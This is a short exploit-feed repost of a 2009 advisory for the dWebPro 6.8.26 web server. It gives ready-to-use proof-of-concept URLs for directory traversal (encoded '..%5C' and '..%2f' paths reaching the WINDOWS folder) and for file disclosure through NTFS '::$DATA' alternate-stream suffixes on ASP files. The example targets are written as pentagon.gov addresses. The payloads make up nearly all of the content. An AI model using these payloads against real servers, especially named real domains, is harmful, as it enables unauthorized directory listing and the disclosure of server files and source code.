dWebPro 6.8.26 (DT/FD) Multiple Remote Vulnerabilities

Home » Exploits » dWebPro 6.8.26 (DT/FD) Multiple Remote Vulnerabilities

Feeds - Exploits

Written by Alfons Luja

Monday, 27 April 2009 20:44

############################################
dWebPro v 6.8.26
============================================
Remote Directory Tarvelsal  && 
Remote File Disclosure p0c's
============================================
Download : http://www.dwebpro.com/downloads/dwebpro_6.8.26.exe
============================================
Autor : Alfons Luja
Tested on Win32 xp home 
############################################

poc 1 Directory Travelsal : we can list directory
   
http://www.penatgon.gov:8080/..%5C/www/..%5C/www/..%5C/..%5C/..%5C/WINDOWS/
http://www.pentagon.gov:8080/..%2f..%2f..%2fWINDOWS%2f

poc 2 File Disclosure : we can disclosure any file in a DOCUMENT_ROOT directory 
by using Alternative Data Streams
   
http://www.pentagon.gov:8080/..\/www/500-100-js.asp::$DATA
http://www.pentagon.gov:8080/demos/aspclassic/asp_registry.asp::$DATA
+++++++++++++++++++++++++++++++++++++++++++++

Security Services by HSC

Contact us

Become partner
Advertise with us
Join our staff